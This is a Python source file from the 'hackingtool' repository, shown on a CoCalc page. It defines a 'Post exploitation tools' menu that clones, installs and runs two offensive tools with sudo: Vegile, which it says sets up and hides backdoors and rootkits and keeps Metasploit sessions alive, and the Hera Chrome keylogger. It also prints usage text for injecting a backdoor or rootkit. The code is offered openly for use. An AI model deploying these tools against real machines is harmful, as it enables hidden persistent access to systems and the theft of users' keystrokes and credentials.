Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
Z4nzu
GitHub Repository: Z4nzu/hackingtool
Path: blob/master/tools/post_exploitation.py
1268 views
1
# coding=utf-8
2
import os
3
4
from core import HackingTool
5
from core import HackingToolsCollection
6
7
8
class Vegile(HackingTool):
9
TITLE = "Vegile - Ghost In The Shell"
10
DESCRIPTION = "This tool will set up your backdoor/rootkits when " \
11
"backdoor is already setup it will be \n" \
12
"hidden your specific process,unlimited your session in " \
13
"metasploit and transparent."
14
INSTALL_COMMANDS = [
15
"sudo git clone https://github.com/Screetsec/Vegile.git",
16
"cd Vegile && sudo chmod +x Vegile"
17
]
18
RUN_COMMANDS = ["cd Vegile && sudo bash Vegile"]
19
PROJECT_URL = "https://github.com/Screetsec/Vegile"
20
21
def before_run(self):
22
os.system('echo "You can Use Command: \n'
23
'[!] Vegile -i / --inject [backdoor/rootkit] \n'
24
'[!] Vegile -u / --unlimited [backdoor/rootkit] \n'
25
'[!] Vegile -h / --help"|boxes -d parchment')
26
27
28
class ChromeKeyLogger(HackingTool):
29
TITLE = "Chrome Keylogger"
30
DESCRIPTION = "Hera Chrome Keylogger"
31
INSTALL_COMMANDS = [
32
"sudo git clone https://github.com/UndeadSec/HeraKeylogger.git",
33
"cd HeraKeylogger && sudo apt-get install python3-pip -y && sudo pip3 install -r requirements.txt"
34
]
35
RUN_COMMANDS = ["cd HeraKeylogger && sudo python3 hera.py"]
36
PROJECT_URL = "https://github.com/UndeadSec/HeraKeylogger"
37
38
39
class PostExploitationTools(HackingToolsCollection):
40
TITLE = "Post exploitation tools"
41
TOOLS = [
42
Vegile(),
43
ChromeKeyLogger()
44
]
45
46